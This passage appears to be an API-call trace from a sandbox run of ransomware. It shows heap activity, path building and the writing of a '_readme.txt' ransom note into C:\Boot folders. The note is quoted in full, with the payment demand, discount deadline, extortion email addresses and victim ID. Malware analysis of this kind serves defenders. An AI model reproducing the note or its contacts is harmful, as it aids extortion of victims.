(HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.758] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.759] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.759] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.759] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.759] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.759] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.759] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.759] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.759] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.759] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.759] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.759] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.759] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.759] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.759] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.759] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.759] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.759] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.759] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.759] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.759] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.759] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.759] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.759] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.759] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.759] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.759] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.759] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.759] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.759] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.759] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.759] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.759] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.759] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.759] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.759] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.760] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.760] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.760] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.760] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.760] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.760] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.760] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.760] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.760] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.760] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.760] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.760] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.760] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.760] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.760] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.760] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.760] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.760] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.760] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.760] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.760] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.760] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.760] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.760] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.760] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.760] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.760] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.760] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.760] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.760] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.760] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.760] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.760] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.760] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.761] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.761] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.761] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.761] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.761] PathFindFileNameW (pszPath="C:\\Boot\\el-GR\\") returned="el-GR\\" [0090.761] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0090.761] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.761] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0090.761] PathFindFileNameW (pszPath="") returned="" [0090.761] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0090.762] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0090.762] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0090.762] FreeLibrary (hLibModule=0x75670000) returned 1 [0090.762] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.762] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0090.762] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.762] PathAppendW (in: pszPath="C:\\Boot\\el-GR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 1 [0090.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.762] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.762] PathFileExistsW (pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 0 [0090.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x7d00) returned 0x99f52d8 [0090.762] lstrcpyW (in: lpString1=0x99f52d8, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" [0090.762] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0090.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99cad78 [0090.762] CreateFileW (lpFileName="C:\\Boot\\el-GR\\_readme.txt" (normalized: "c:\\boot\\el-gr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0090.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0090.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x857) returned 0x3189d50 [0090.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x3189d50, cbMultiByte=2135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1112 [0090.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x316f0d0 [0090.763] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3189d50 | out: hHeap=0x680000) returned 1 [0090.763] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.763] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1111 [0090.763] WriteFile (in: hFile=0x5cc, lpBuffer=0x316f0d0*, nNumberOfBytesToWrite=0x457, lpNumberOfBytesWritten=0x9ccfb64, lpOverlapped=0x0 | out: lpBuffer=0x316f0d0*, lpNumberOfBytesWritten=0x9ccfb64*=0x457, lpOverlapped=0x0) returned 1 [0090.764] CloseHandle (hObject=0x5cc) returned 1 [0090.764] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316f0d0 | out: hHeap=0x680000) returned 1 [0090.764] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99cad78 | out: hHeap=0x680000) returned 1 [0090.764] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0090.764] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.764] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa328e000, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa328e000, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0090.765] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.765] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa328e000, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa328e000, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.765] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0090.765] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa328e000, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa328e000, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa328e000, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0090.765] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa328e000, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa328e000, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa328e000, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0090.765] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0090.765] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.765] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0090.765] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef28 [0090.765] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.765] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.765] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.765] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.765] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.765] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.765] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.765] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.765] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.765] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.765] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.765] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.765] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.765] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.765] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.765] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.766] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.766] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.766] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.766] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.766] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.766] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.766] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.766] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.766] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.766] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.766] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.766] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.766] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.766] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.766] PathFindFileNameW (pszPath="C:\\Boot\\en-US\\") returned="en-US\\" [0090.766] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.766] PathFindFileNameW 